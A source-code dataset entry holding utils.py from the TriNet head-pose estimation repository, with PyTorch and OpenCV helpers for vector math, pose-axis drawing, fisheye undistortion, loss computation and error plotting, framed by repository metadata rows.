    # Guard so importing this module does not immediately run the suite.
    unittest.main()
| 54.033735 | 187 | 0.417566 |
79547b1a033bc78ce4a769f4afd9c05190ea0974 | 24,529 | py | Python | utils.py | chuzcjoe/TriNet | d2689de7362f1845b5c399f1f9f66f42eb4df23f | [
"MIT"
] | 10 | 2020-02-12T20:54:10.000Z | 2022-03-17T03:18:54.000Z | utils.py | chuzcjoe/TriNet | d2689de7362f1845b5c399f1f9f66f42eb4df23f | [
"MIT"
] | 2 | 2020-04-24T22:18:41.000Z | 2021-12-27T05:22:09.000Z | utils.py | chuzcjoe/TriNet | d2689de7362f1845b5c399f1f9f66f42eb4df23f | [
"MIT"
] | 2 | 2020-02-12T20:54:37.000Z | 2020-03-26T05:17:33.000Z | # -*- coding:utf-8 -*-
"""
utils script
"""
import os
import cv2
import torch
import numpy as np
import matplotlib
#matplotlib.use("Qt4Agg")
import math
import matplotlib.pyplot as plt
from math import cos, sin
from mpl_toolkits.mplot3d.axes3d import Axes3D
#from rotation import Rotation as R
from scipy.linalg import norm
#from loss import hellinger
import math
def mkdir(dir_path):
    """
    Create ``dir_path`` if it does not already exist.

    :param dir_path: directory path to create (missing parents are created too)
    :return: None
    """
    # makedirs(..., exist_ok=True) is race-free (no exists()/mkdir() gap)
    # and, unlike os.mkdir, also creates missing parent directories.
    os.makedirs(dir_path, exist_ok=True)
def bbox_300W(txt_path):
    """Read a 300W label file and return the bbox on line 2 as a list of ints."""
    with open(txt_path, 'r') as handle:
        bbox_line = handle.read().splitlines()[1]
    return [int(coord) for coord in bbox_line.split(',')]
def norm_vector(v):
    """
    Scale ``v`` to unit length along its last dimension.

    :param v: torch tensor of vectors
    :return: tensor of the same shape with unit-norm last dimension
    """
    # keepdim=True is equivalent to the norm + unsqueeze pair.
    return v / v.norm(dim=-1, keepdim=True)
#_SQRT2 = np.sqrt(2, dtype='float32') # sqrt(2) with default precision np.float64
#_SQRT2 = torch.tensor(_SQRT2).cuda(0)
def hellinger(p, q):
    """Row-wise Hellinger distance between the distributions ``p`` and ``q``."""
    sqrt_diff = p.sqrt() - q.sqrt()
    return sqrt_diff.norm(dim=1) / math.sqrt(2)
def vector_cos(u, v):
    """
    Row-wise cosine similarity between ``u`` and ``v``.

    The result is clamped just inside (-1, 1) so a later ``torch.acos``
    never sees an out-of-range value caused by floating-point error.
    """
    assert u.shape == v.shape, 'shape of two vectors should be same'
    dot = torch.sum(u * v, dim=1)
    norm_product = torch.sqrt(torch.sum(u ** 2, dim=1) * torch.sum(v ** 2, dim=1))
    eps = 10.0 ** (-4)
    return torch.clamp(dot / norm_product, min=float(-1.0 + eps), max=float(1.0 - eps))
def load_filtered_stat_dict(model, snapshot):
    """Load ``snapshot`` into ``model``, ignoring keys the model does not define."""
    model_dict = model.state_dict()
    compatible = {name: value for name, value in snapshot.items() if name in model_dict}
    model_dict.update(compatible)
    model.load_state_dict(model_dict)
def softmax(input):
    """
    Numerically stable numpy softmax.

    A small constant (1e-6) is added to every probability, so the output
    is strictly positive but sums to slightly more than 1.
    """
    shifted_exp = np.exp(input - np.max(input))
    return shifted_exp / np.sum(shifted_exp) + (10 ** -6)
def draw_bbox(img, bbox):
    """
    Draw a white face bounding box on ``img``.

    :param img: np.ndarray(H, W, C) image
    :param bbox: [x1, y1, x2, y2]
    :return: image with the rectangle drawn
    """
    top_left = (int(bbox[0]), int(bbox[1]))
    bottom_right = (int(bbox[2]), int(bbox[3]))
    return cv2.rectangle(img, top_left, bottom_right, (255, 255, 255))
def draw_front(img, x, y, width, tdx=None, tdy=None, size=100, color=(0, 255, 0)):
    """
    draw face orientation vector in image
    :param img: face image
    :param x: x component of the face orientation vector
    :param y: y component of the face orientation vector
    :param width: arrow length in pixels (always overrides ``size``)
    :param tdx: x of start point; defaults to the image centre
    :param tdy: y of start point; defaults to the image centre
    :param size: legacy length parameter, kept only for call compatibility
    :param color: BGR arrow colour
    :return: image with the arrow drawn
    """
    size = width
    if tdx != None and tdy != None:
        start_x, start_y = tdx, tdy
    else:
        height, img_width = img.shape[:2]
        start_x, start_y = img_width / 2, height / 2
    end_x = start_x + size * x
    # BUG FIX: the original computed ``tdy - size * y`` and immediately
    # overwrote it with ``tdy + size * y``; the dead assignment is removed
    # and the effective (last-wins) behaviour is kept.
    end_y = start_y + size * y
    cv2.arrowedLine(img, (int(start_x), int(start_y)), (int(end_x), int(end_y)),
                    color, tipLength=0.2, thickness=5)
    return img
def draw_axis(img, pitch, yaw, roll, tdx=None, tdy=None, size=60):
    """
    Draw the three head-pose axes on an image.

    :param img: original images.[np.ndarray]
    :param pitch: pitch angle in radians
    :param yaw: yaw angle in radians (negated internally)
    :param roll: roll angle in radians
    :param tdx: x-axis for start point
    :param tdy: y-axis for start point
    :param size: line size
    :return: image with the three axes drawn on it
    """
    pitch = pitch
    # Yaw is sign-flipped so the drawn axes match the image convention.
    yaw = -yaw
    roll = roll
    if tdx != None and tdy != None:
        tdx = tdx
        tdy = tdy
    else:
        # Default origin of the axes is the image centre.
        height, width = img.shape[:2]
        tdx = width / 2
        tdy = height / 2
    # X-Axis pointing to right. drawn in red
    x1 = size * (cos(yaw) * cos(roll)) + tdx
    y1 = size * (cos(pitch) * sin(roll) + cos(roll) * sin(pitch) * sin(yaw)) + tdy
    # Y-Axis | drawn in green
    #        v
    x2 = size * (-cos(yaw) * sin(roll)) + tdx
    y2 = size * (cos(pitch) * cos(roll) - sin(pitch) * sin(yaw) * sin(roll)) + tdy
    # Z-Axis (out of the screen) drawn in blue
    x3 = size * (sin(yaw)) + tdx
    y3 = size * (-cos(yaw) * sin(pitch)) + tdy
    # NOTE(review): colours are BGR; (0, 255, 255) is yellow, not red as the
    # comment above says -- confirm which is intended.
    cv2.line(img, (int(tdx), int(tdy)), (int(x1), int(y1)), (0, 255, 255), 3)
    cv2.line(img, (int(tdx), int(tdy)), (int(x2), int(y2)), (0, 255, 0), 3)
    cv2.line(img, (int(tdx), int(tdy)), (int(x3), int(y3)), (255, 0, 0), 3)
    return img
def remove_distortion(img):
    """
    Crop ``img`` to 960x720 around its centre and undo fisheye distortion.

    Uses hard-coded camera intrinsics ``K`` and fisheye distortion
    coefficients ``D`` for the capturing camera.

    :param img: np.ndarray(H, W, C) fisheye image; assumed to be at least
        960x720 -- TODO confirm with callers.
    :return: undistorted 960x720 image
    """
    DIM = (960, 720)
    h, w, c = img.shape
    wt = 960
    ht = 720
    # Centred crop window [x1, y1, x2, y2].
    border = [int((w-wt)/2), int((h-ht)/2), int(w - (w-wt)/2), int(h - (h-ht)/2)]
    # Camera intrinsic matrix (fx, fy, cx, cy).
    K = np.array([[424.57214422800234, 0.0, 464.31976295418264],
                  [0.0, 424.9291201199454, 362.78142329711255],
                  [0.0, 0.0, 1.0]])
    # Fisheye distortion coefficients (k1..k4).
    D = np.array([[-0.02364380260312553], [0.03507545568167827], [-0.059312268236712096], [0.03479088452999722]])
    crop_img = img[border[1]:border[3],border[0]:border[2],:]
    #print(crop_img.shape)
    #cv2.imshow("cropped", crop_img) # uncomment this line if error messages show up.
    map1, map2 = cv2.fisheye.initUndistortRectifyMap(K, D, np.eye(3), K, DIM, cv2.CV_16SC2)
    undistorted_img = cv2.remap(crop_img, map1, map2, interpolation=cv2.INTER_LINEAR, borderMode=cv2.BORDER_CONSTANT)
    return undistorted_img
def draw_3d_coor(v1, v2, v3, img, ax):
    """
    Plot three 3-D vectors from the origin on ``ax`` and refresh the figure.

    :param v1: vector drawn in red
    :param v2: vector drawn in green
    :param v3: vector drawn in blue
    :param img: unused here; kept for call compatibility
    :param ax: matplotlib 3-D axes being drawn on
    :return: None
    """
    zero = np.zeros(3)
    # plot test data
    # Axes are passed as (y, x, z) when plotting -- presumably to match the
    # camera coordinate convention; confirm against the caller.
    x, y, z = zip(zero, v1)
    plt.plot(y, x, z, '-r', linewidth=3)
    x, y, z = zip(zero, v2)
    plt.plot(y, x, z, '-g', linewidth=3)
    x, y, z = zip(zero, v3)
    plt.plot(y, x, z, '-b', linewidth=3)
    ax.set_xlim(-1, 1)
    ax.set_ylim(-1, 1)
    ax.set_zlim(-1, 1)
    plt.draw()
    #print("draw")
    # Brief pause lets the GUI event loop render before clearing the axes
    # for the next frame.
    plt.pause(0.0000001)
    plt.cla()
def get_label_from_txt(txt_path):
    """Parse the first line of ``txt_path`` as space-separated floats."""
    with open(txt_path, 'r') as handle:
        first_line = handle.read().splitlines()[0]
    return [float(token) for token in first_line.split(' ')]
def get_front_vector(txt_path):
    """Parse the first line of ``txt_path`` as comma-separated floats."""
    with open(txt_path, 'r') as handle:
        first_line = handle.read().splitlines()[0]
    return [float(token) for token in first_line.split(',')]
def get_info_from_txt(txt_path):
    """
    Parse the first four lines of ``txt_path`` as space-separated float lists.

    :param txt_path: label file path
    :return: list of four float lists, one per line
    """
    with open(txt_path, 'r') as fr:
        lines = fr.read().splitlines()
    # The original unrolled this parse for lines 0-3; a loop is equivalent
    # and removes the copy/paste duplication.
    return [[float(token) for token in lines[i].split(' ')] for i in range(4)]
def Vector300W(txt_path):
    """Return the (left, down, front) vectors from lines 3-5 of a 300W label file."""
    with open(txt_path, 'r') as handle:
        lines = handle.read().splitlines()
    vectors = [[float(token) for token in lines[idx].split(',')] for idx in (2, 3, 4)]
    return vectors[0], vectors[1], vectors[2]
def Bbox300W(txt_path):
    """
    Return the bounding-box line (line 2) of a 300W label file split on commas.

    Note: unlike ``bbox_300W`` this keeps the fields as strings.
    """
    with open(txt_path, 'r') as handle:
        return handle.read().splitlines()[1].split(',')
def degress_score(cos_value, error_degrees):
    """
    Score each cosine as 1.0 when its angle is below ``error_degrees``, else 0.0.

    :param cos_value: iterable of cosine values between predicted and true vectors
    :param error_degrees: angular tolerance in degrees, integer
    :return: float tensor of per-item 0/1 scores
    """
    threshold = cos(error_degrees * np.pi / 180)
    return torch.tensor([1.0 if value > threshold else 0.0 for value in cos_value])
def get_transform(rx, ry, rz):
    '''
    Build the combined rotation matrix R_z @ R_y @ R_x.

    Args:
        rx, ry, rz: rotation along x, y, z axes (in radians)
    Returns:
        transform: 3*3 rotation matrix
    '''
    cx, sx = np.cos(rx), np.sin(rx)
    cy, sy = np.cos(ry), np.sin(ry)
    cz, sz = np.cos(rz), np.sin(rz)
    rot_x = np.array([[1.0, 0.0, 0.0],
                      [0.0, cx, sx],
                      [0.0, -sx, cx]])
    rot_y = np.array([[cy, 0.0, -sy],
                      [0.0, 1.0, 0.0],
                      [sy, 0.0, cy]])
    rot_z = np.array([[cz, -sz, 0.0],
                      [sz, cz, 0.0],
                      [0.0, 0.0, 1.0]])
    return rot_z @ rot_y @ rot_x
def get_attention_vector(quat):
    """
    get face orientation vector from quaternion

    :param quat: quaternion describing the head rotation
    :return: 3-element np.ndarray -- the rotated front (z) unit vector
    """
    # NOTE(review): ``R`` is the Rotation helper whose import
    # (``from rotation import Rotation as R``) is commented out at the top of
    # this file, so this function raises NameError unless it is re-enabled.
    dcm = R.quat2dcm(quat)
    v_front = np.mat([[0], [0], [1]])
    v_front = dcm * v_front
    v_front = np.array(v_front).reshape(3)
    # v_top = np.mat([[0], [1], [0]])
    # v_top = dcm * v_top
    # v_top = np.array(v_top).reshape(3)
    # return np.hstack([v_front, v_top])
    return v_front
def get_vectors(info):
    """
    Express the object's x/y/z axes in the camera coordinate frame.

    :param info: four float lists as returned by ``get_info_from_txt``:
        [camera xyz, camera (pitch, yaw, roll) in degrees,
         object xyz, object (pitch, yaw, roll) in degrees]
    :return: (vec_ocx, vec_ocy, vec_ocz) -- the object's unit axes rotated
        into camera coordinates
    """
    # camera (x, y, z)
    # We don't use them for now
    xc_val = float(info[0][0])
    yc_val = float(info[0][1])
    zc_val = float(info[0][2])
    # camera (roll, pitch, yaw)
    pitchc_val = float(info[1][0])
    yawc_val = float(info[1][1])
    rollc_val = float(info[1][2])
    # --------------------------------
    # object (x, y, z)
    xo_val = float(info[2][0])
    yo_val = float(info[2][1])
    zo_val = float(info[2][2])
    # object (roll, pitch, yaw)
    pitcho_val = float(info[3][0])
    yawo_val = float(info[3][1])
    rollo_val = float(info[3][2])
    # [roll, pitch, yaw] of cameras& objects in the world
    rpy_cw = np.array([rollc_val, pitchc_val, yawc_val])
    rpy_ow = np.array([rollo_val, pitcho_val, yawo_val])
    # Angles arrive in degrees; the rotation builder expects radians.
    rpy_cw = [math.radians(x) for x in rpy_cw]
    rpy_ow = [math.radians(x) for x in rpy_ow]
    # get the transformations
    T_wo = get_transform(rpy_ow[0], rpy_ow[1], rpy_ow[2])
    T_wc = get_transform(rpy_cw[0], rpy_cw[1], rpy_cw[2])
    # inv(T_wc) @ T_wo maps object-frame directions into the camera frame.
    vec_ocx = np.linalg.inv(T_wc) @ T_wo @ np.array([1.0, 0.0, 0.0])
    vec_ocy = np.linalg.inv(T_wc) @ T_wo @ np.array([0.0, 1.0, 0.0])
    vec_ocz = np.linalg.inv(T_wc) @ T_wo @ np.array([0.0, 0.0, 1.0])
    return vec_ocx, vec_ocy, vec_ocz
def rotationMatrixToRollPitchYaw(R) :
    """
    Convert a 3*3 rotation matrix to sign-flipped roll/pitch/yaw.

    Args:
        R: 3*3 rotation matrix
    Returns:
        np.array of [roll, pitch, yaw] in degrees, each negated
    """
    # assert(isRotationMatrix(R))
    cos_pitch = math.sqrt(R[0, 0] * R[0, 0] + R[1, 0] * R[1, 0])
    if cos_pitch >= 1e-6:
        # Regular case: pitch is away from +/-90 degrees.
        angles = (math.atan2(R[2, 1], R[2, 2]),
                  math.atan2(-R[2, 0], cos_pitch),
                  math.atan2(R[1, 0], R[0, 0]))
    else:
        # Gimbal-lock fallback: yaw is fixed to zero.
        angles = (math.atan2(-R[1, 2], R[1, 1]),
                  math.atan2(-R[2, 0], cos_pitch),
                  0)
    return np.array(angles) * -1 * 180.0 / np.pi
def smooth_one_hot(true_labels, classes, smoothing=0.1):
    """
    Label-smoothed one-hot encoding (smoothing == 0 reduces to plain one-hot).

    Note: only the distribution for the first label in the batch is returned,
    matching the original behaviour.
    """
    assert 0 <= smoothing < 1
    on_value = 1.0 - smoothing
    off_value = smoothing / (classes - 1)
    with torch.no_grad():
        dist = torch.full((true_labels.size(0), classes), off_value)
        dist.scatter_(1, true_labels.data.unsqueeze(1), on_value)
    return dist[0]
def get_soft_label(cls_label, num_classes, slop = 1, dis_coef = 0.5, coef = 1):
    """
    Build a soft-label distribution centred on ``cls_label``.

    :param cls_label: ground-truth class label (1-based)
    :param num_classes: number of classes
    :param slop: unused legacy parameter, kept for call compatibility
    :param dis_coef: exponent applied to |label - class| distances
    :param coef: scale applied before normalisation (cancels out)
    :return: 1-D tensor of ``num_classes`` probabilities summing to 1
    """
    class_idx = torch.arange(1, num_classes + 1).type_as(torch.FloatTensor())
    # Weight falls off as exp(-|d|^dis_coef) around the true class.
    distance = torch.abs(float(cls_label) - class_idx) ** dis_coef
    weights = torch.exp(-distance) * coef
    return weights / torch.sum(weights)
def computeLoss(cls_label_v1, cls_label_v2, cls_label_v3,
                vector_label_v1, vector_label_v2, vector_label_v3,
                logits, softmax, sigmoid, cls_criterion, reg_criterion, l_targets, d_targets, f_targets, params, cls_coef=1):
    """
    Combined classification + regression loss for the three predicted vectors.

    :param cls_label_v1/v2/v3: classification targets, indexed ``[:, k]`` for
        the x/y/z components (soft labels used by the BCE / KLDiv branches)
    :param vector_label_v1/v2/v3: ground-truth vectors, shape (B, 3)
    :param logits: 9-tuple of per-component network outputs
        (x, y, z for each of the three vectors)
    :param softmax, sigmoid: activation modules applied to the logits
    :param cls_criterion: classification loss (BCE / CrossEntropy / FocalLoss / KLDiv)
    :param reg_criterion: regression loss applied per the ``reg_type`` branch
    :param l_targets, d_targets, f_targets: integer class targets used by the
        CrossEntropy and FocalLoss branches
    :param params: (num_classes, alpha, beta, cls_type, reg_type, add_ortho)
    :param cls_coef: weight of the classification term
    :return: ([loss_v1, loss_v2, loss_v3], degree_error_v1, degree_error_v2,
        degree_error_v3) where the degree errors are mean angular errors

    NOTE(review): ``loss_v*`` are only assigned inside the ``reg_type`` ==
    "value" / "acos" branches; any other ``reg_type`` raises NameError at the
    end. Tensors are created with ``.cuda(0)``, so a CUDA device is required.
    """
    num_classes, alpha, beta, cls_type, reg_type, add_ortho = params
    # get x,y,z cls label
    x_cls_label_v1 = cls_label_v1[:, 0]
    y_cls_label_v1 = cls_label_v1[:, 1]
    z_cls_label_v1 = cls_label_v1[:, 2]
    x_cls_label_v2 = cls_label_v2[:, 0]
    y_cls_label_v2 = cls_label_v2[:, 1]
    z_cls_label_v2 = cls_label_v2[:, 2]
    x_cls_label_v3 = cls_label_v3[:, 0]
    y_cls_label_v3 = cls_label_v3[:, 1]
    z_cls_label_v3 = cls_label_v3[:, 2]
    # get x,y,z continue label
    x_reg_label_v1 = vector_label_v1[:, 0]
    y_reg_label_v1 = vector_label_v1[:, 1]
    z_reg_label_v1 = vector_label_v1[:, 2]
    x_reg_label_v2 = vector_label_v2[:, 0]
    y_reg_label_v2 = vector_label_v2[:, 1]
    z_reg_label_v2 = vector_label_v2[:, 2]
    x_reg_label_v3 = vector_label_v3[:, 0]
    y_reg_label_v3 = vector_label_v3[:, 1]
    z_reg_label_v3 = vector_label_v3[:, 2]
    x_pred_v1, y_pred_v1, z_pred_v1, x_pred_v2, y_pred_v2, z_pred_v2, x_pred_v3, y_pred_v3, z_pred_v3 = logits
    # -------------------------------------------BCELoss(for classify, manually apply softmax layer)---------------------------------------------
    if cls_type == "BCE":
        assert ((cls_label_v1 >= 0.) & (cls_label_v1 <= 1.)).all()
        x_cls_loss_v1 = cls_criterion(sigmoid(x_pred_v1), x_cls_label_v1)
        y_cls_loss_v1 = cls_criterion(sigmoid(y_pred_v1), y_cls_label_v1)
        z_cls_loss_v1 = cls_criterion(sigmoid(z_pred_v1), z_cls_label_v1)
        assert ((cls_label_v2 >= 0.) & (cls_label_v2 <= 1.)).all()
        x_cls_loss_v2 = cls_criterion(sigmoid(x_pred_v2), x_cls_label_v2)
        y_cls_loss_v2 = cls_criterion(sigmoid(y_pred_v2), y_cls_label_v2)
        z_cls_loss_v2 = cls_criterion(sigmoid(z_pred_v2), z_cls_label_v2)
        assert ((cls_label_v3 >= 0.) & (cls_label_v3 <= 1.)).all()
        x_cls_loss_v3 = cls_criterion(sigmoid(x_pred_v3), x_cls_label_v3)
        y_cls_loss_v3 = cls_criterion(sigmoid(y_pred_v3), y_cls_label_v3)
        z_cls_loss_v3 = cls_criterion(sigmoid(z_pred_v3), z_cls_label_v3)
    elif cls_type == 'CrossEntropy':
        x_cls_loss_v1 = cls_criterion(x_pred_v1, l_targets[:,0])
        y_cls_loss_v1 = cls_criterion(y_pred_v1, l_targets[:,1])
        z_cls_loss_v1 = cls_criterion(z_pred_v1, l_targets[:,2])
        x_cls_loss_v2 = cls_criterion(x_pred_v2, d_targets[:,0])
        y_cls_loss_v2 = cls_criterion(y_pred_v2, d_targets[:,1])
        z_cls_loss_v2 = cls_criterion(z_pred_v2, d_targets[:,2])
        x_cls_loss_v3 = cls_criterion(x_pred_v3, f_targets[:,0])
        y_cls_loss_v3 = cls_criterion(y_pred_v3, f_targets[:,1])
        z_cls_loss_v3 = cls_criterion(z_pred_v3, f_targets[:,2])
    #----------------------------------------FocalLoss-----------------------------------------
    elif cls_type == 'FocalLoss':
        x_cls_loss_v1 = cls_criterion(x_pred_v1, l_targets[:,0])
        y_cls_loss_v1 = cls_criterion(y_pred_v1, l_targets[:,1])
        z_cls_loss_v1 = cls_criterion(z_pred_v1, l_targets[:,2])
        x_cls_loss_v2 = cls_criterion(x_pred_v2, d_targets[:,0])
        y_cls_loss_v2 = cls_criterion(y_pred_v2, d_targets[:,1])
        z_cls_loss_v2 = cls_criterion(z_pred_v2, d_targets[:,2])
        x_cls_loss_v3 = cls_criterion(x_pred_v3, f_targets[:,0])
        y_cls_loss_v3 = cls_criterion(y_pred_v3, f_targets[:,1])
        z_cls_loss_v3 = cls_criterion(z_pred_v3, f_targets[:,2])
    # -------------------------------------------KL Divergence Loss-------------------------------------
    elif cls_type == "KLDiv":
        # 10e-6 keeps log() and the target away from zero.
        x_cls_loss_v1 = cls_criterion((softmax(x_pred_v1)+10e-6).log(), x_cls_label_v1+10e-6)
        y_cls_loss_v1 = cls_criterion((softmax(y_pred_v1)+10e-6).log(), y_cls_label_v1+10e-6)
        z_cls_loss_v1 = cls_criterion((softmax(z_pred_v1)+10e-6).log(), z_cls_label_v1+10e-6)
        x_cls_loss_v2 = cls_criterion((softmax(x_pred_v2)+10e-6).log(), x_cls_label_v2+10e-6)
        y_cls_loss_v2 = cls_criterion((softmax(y_pred_v2)+10e-6).log(), y_cls_label_v2+10e-6)
        z_cls_loss_v2 = cls_criterion((softmax(z_pred_v2)+10e-6).log(), z_cls_label_v2+10e-6)
        x_cls_loss_v3 = cls_criterion((softmax(x_pred_v3)+10e-6).log(), x_cls_label_v3+10e-6)
        y_cls_loss_v3 = cls_criterion((softmax(y_pred_v3)+10e-6).log(), y_cls_label_v3+10e-6)
        z_cls_loss_v3 = cls_criterion((softmax(z_pred_v3)+10e-6).log(), z_cls_label_v3+10e-6)
    length = x_pred_v1.shape[0]
    # get prediction vector(get continue value from classify result)
    x_reg_pred_v1, y_reg_pred_v1, z_reg_pred_v1, vector_pred_v1 = classify2vector(x_pred_v1, y_pred_v1, z_pred_v1, softmax, num_classes)
    x_reg_pred_v2, y_reg_pred_v2, z_reg_pred_v2, vector_pred_v2 = classify2vector(x_pred_v2, y_pred_v2, z_pred_v2, softmax, num_classes)
    x_reg_pred_v3, y_reg_pred_v3, z_reg_pred_v3, vector_pred_v3 = classify2vector(x_pred_v3, y_pred_v3, z_pred_v3, softmax, num_classes)
    # Regression loss
    if reg_type == "value":
        x_reg_loss_v1 = reg_criterion(x_reg_pred_v1, x_reg_label_v1)
        y_reg_loss_v1 = reg_criterion(y_reg_pred_v1, y_reg_label_v1)
        z_reg_loss_v1 = reg_criterion(z_reg_pred_v1, z_reg_label_v1)
        x_reg_loss_v2 = reg_criterion(x_reg_pred_v2, x_reg_label_v2)
        y_reg_loss_v2 = reg_criterion(y_reg_pred_v2, y_reg_label_v2)
        z_reg_loss_v2 = reg_criterion(z_reg_pred_v2, z_reg_label_v2)
        x_reg_loss_v3 = reg_criterion(x_reg_pred_v3, x_reg_label_v3)
        y_reg_loss_v3 = reg_criterion(y_reg_pred_v3, y_reg_label_v3)
        z_reg_loss_v3 = reg_criterion(z_reg_pred_v3, z_reg_label_v3)
        #-----------cls+reg loss-------------------------
        loss_v1 = cls_coef * (x_cls_loss_v1 + y_cls_loss_v1 + z_cls_loss_v1) + alpha * (x_reg_loss_v1 + y_reg_loss_v1 + z_reg_loss_v1)
        loss_v2 = cls_coef * (x_cls_loss_v2 + y_cls_loss_v2 + z_cls_loss_v2) + alpha * (x_reg_loss_v2 + y_reg_loss_v2 + z_reg_loss_v2)
        loss_v3 = cls_coef * (x_cls_loss_v3 + y_cls_loss_v3 + z_cls_loss_v3) + alpha * (x_reg_loss_v3 + y_reg_loss_v3 + z_reg_loss_v3)
    #-------------------------acos loss---------------------------------
    if reg_type == 'acos':
        reg_loss_v1 = reg_criterion(torch.acos(vector_cos(vector_label_v1, vector_pred_v1)), torch.tensor(np.array([0.0]*length, dtype=np.float32)).cuda(0))
        reg_loss_v2 = reg_criterion(torch.acos(vector_cos(vector_label_v2, vector_pred_v2)), torch.tensor(np.array([0.0]*length, dtype=np.float32)).cuda(0))
        reg_loss_v3 = reg_criterion(torch.acos(vector_cos(vector_label_v3, vector_pred_v3)), torch.tensor(np.array([0.0]*length, dtype=np.float32)).cuda(0))
        #------------cls+reg loss-------------------
        loss_v1 = cls_coef * (x_cls_loss_v1 + y_cls_loss_v1 + z_cls_loss_v1) + alpha * reg_loss_v1
        loss_v2 = cls_coef * (x_cls_loss_v2 + y_cls_loss_v2 + z_cls_loss_v2) + alpha * reg_loss_v2
        loss_v3 = cls_coef * (x_cls_loss_v3 + y_cls_loss_v3 + z_cls_loss_v3) + alpha * reg_loss_v3
    # if add ortho loss
    if add_ortho:
        # Pairwise dot products pushed toward zero keep the three predicted
        # vectors mutually orthogonal.
        loss_ortho_12 = reg_criterion(torch.sum(vector_pred_v1 * vector_pred_v2, axis=1), torch.tensor(np.array([0.0]*length, dtype=np.float32)).cuda(0))
        loss_ortho_13 = reg_criterion(torch.sum(vector_pred_v1 * vector_pred_v3, axis=1), torch.tensor(np.array([0.0]*length, dtype=np.float32)).cuda(0))
        loss_ortho_23 = reg_criterion(torch.sum(vector_pred_v2 * vector_pred_v3, axis=1), torch.tensor(np.array([0.0]*length, dtype=np.float32)).cuda(0))
        #-----------total loss
        loss_v1 += beta * (loss_ortho_12 + loss_ortho_13)
        loss_v2 += beta * (loss_ortho_12 + loss_ortho_23)
        loss_v3 += beta * (loss_ortho_23 + loss_ortho_13)
    loss = [loss_v1, loss_v2, loss_v3]
    # get predicted vector errors
    cos_value_v1 = vector_cos(vector_pred_v1, vector_label_v1)
    degree_error_v1 = torch.mean(torch.acos(cos_value_v1) * 180 / np.pi)
    cos_value_v2 = vector_cos(vector_pred_v2, vector_label_v2)
    degree_error_v2 = torch.mean(torch.acos(cos_value_v2) * 180 / np.pi)
    cos_value_v3 = vector_cos(vector_pred_v3, vector_label_v3)
    degree_error_v3 = torch.mean(torch.acos(cos_value_v3) * 180 / np.pi)
    return loss, degree_error_v1, degree_error_v2, degree_error_v3
def classify2vector(x, y, z, softmax, num_classes):
    """
    get vector from classify results
    :param x: fc_x output,np.ndarray(66,)
    :param y: fc_y output,np.ndarray(66,)
    :param z: fc_z output,np.ndarray(66,)
    :param softmax: softmax function
    :param num_classes: number of classify, integer
    :return: (x_reg, y_reg, z_reg, pred_vector) -- continuous components and
        the unit-normalized prediction vectors
    """
    # Bin centres spread uniformly over [-1, 1]; the expectation over the
    # softmax probabilities turns each classification head into a value.
    # BUG FIX: the original built this tensor twice, first with .cuda(1)
    # (which raises on single-GPU machines) and then with .cuda(0); the
    # dead cuda:1 pair is removed.
    idx_tensor = np.linspace(-1, 1, num_classes)
    idx_tensor = torch.FloatTensor(idx_tensor).cuda(0)
    x_probability = softmax(x)
    y_probability = softmax(y)
    z_probability = softmax(z)
    x_pred = torch.sum(x_probability * idx_tensor, dim=-1)
    y_pred = torch.sum(y_probability * idx_tensor, dim=-1)
    z_pred = torch.sum(z_probability * idx_tensor, dim=-1)
    pred_vector = torch.stack([x_pred, y_pred, z_pred]).transpose(1, 0)
    pred_vector = norm_vector(pred_vector)
    # split to x,y,z
    x_reg = pred_vector[:, 0]
    y_reg = pred_vector[:, 1]
    z_reg = pred_vector[:, 2]
    return x_reg, y_reg, z_reg, pred_vector
def show_loss_distribute(loss_dict, analysis_dir, snapshot_name):
    """
    Scatter-plot the per-image degree errors of the three vectors and save
    the figure as ``<snapshot_name>.png``.

    :param loss_dict: dict with keys 'img_name', 'degree_error_f',
        'degree_error_r' and 'degree_error_u' (per-image error lists)
    :param analysis_dir: directory for saving image
    :param snapshot_name: model snapshot name (used as the output file name)
    :return: None
    """
    #plt.switch_backend('agg')
    detail = snapshot_name
    n = len(loss_dict["img_name"])
    x = [i+1 for i in range(n)]
    front_error = loss_dict['degree_error_f']
    right_error = loss_dict['degree_error_r']
    up_error = loss_dict['degree_error_u']
    fig, (ax1, ax2, ax3) = plt.subplots(1, 3, figsize=(20,10))
    fig.suptitle('Error distribution')
    ax1.scatter(x, front_error)
    ax2.scatter(x, right_error)
    ax3.scatter(x, up_error)
    # NOTE(review): plt.show() blocks with interactive backends; savefig is
    # only reached once the window is closed -- confirm this is intended.
    plt.show()
    #angles = np.array(loss_dict['angles']) * 180 / np.pi
    #degrees_error = np.array(loss_dict['degree_error'])
    #plt.subplots(figsize=(30, 10))
    # figure pitch,yaw,roll
    #for i, name in enumerate(['Pitch', 'Yaw', 'Roll']):
    #    plt.subplot(1, 3, i + 1)
    #    plt.xlim(-100, 105)
    #    plt.xticks([j for j in range(-100, 105, 20)], [j for j in range(-100, 105, 20)])
    #    plt.ylim(-100, 105)
    #    plt.yticks([j for j in range(-100, 105, 10)], [j for j in range(-100, 105, 10)])
    #    plt.scatter(angles[:, i], degrees_error, linewidths=0.2)
    #    plt.title(name + ":Loss distribution(" + detail + ")")
    #    plt.xlabel(name + ":GT")
    #    plt.ylabel(name + ":Loss(degree-error)")
    #    plt.grid()
    plt.savefig(os.path.join(analysis_dir, detail + '.png'))
def collect_score(degree_dict, save_dir):
    """
    Plot cumulative accuracy versus angular-error threshold and save it as
    ``collect_score.png``.

    :param degree_dict: dict with key 'degree_error' holding per-sample
        angular errors (numpy-comparable array)
    :param save_dir: directory the plot is written to
    :return: None
    """
    plt.switch_backend('agg')
    # Thresholds from 0 to 180 degrees in 5-degree steps.
    x = np.array(range(0, 181, 5))
    degree_error = degree_dict['degree_error']
    mount = np.zeros(len(x))
    for j in range(len(x)):
        # Fraction of samples whose error is below the threshold.
        mount[j] = sum(degree_error < x[j])
    y = mount / len(degree_error)
    plt.plot(x, y, c="red", label="MobileNetV2")
    plt.legend(loc='lower right', fontsize='x-small')
    plt.xlabel('degrees upper limit')
    plt.ylabel('accuracy')
    plt.xlim(0, 105)
    plt.ylim(0., 1.05)
    plt.xticks([j for j in range(0, 105, 5)], [j for j in range(0, 105, 5)])
    plt.yticks([j / 100 for j in range(0, 105, 5)], [j / 100 for j in range(0, 105, 5)])
    plt.title("accuracy under degree upper limit")
    plt.grid()
    plt.savefig(save_dir + '/collect_score.png')
| 33.60137 | 156 | 0.619838 |
79547c715fbce146ff26b3b55d49f985cd525493 | 6,236 | py | Python | diffy/plugins/diffy_local/plugin.py | TheGableMethod/diffy | f3f22cfdee4103619355c0987a4bfedf9f053a29 | [
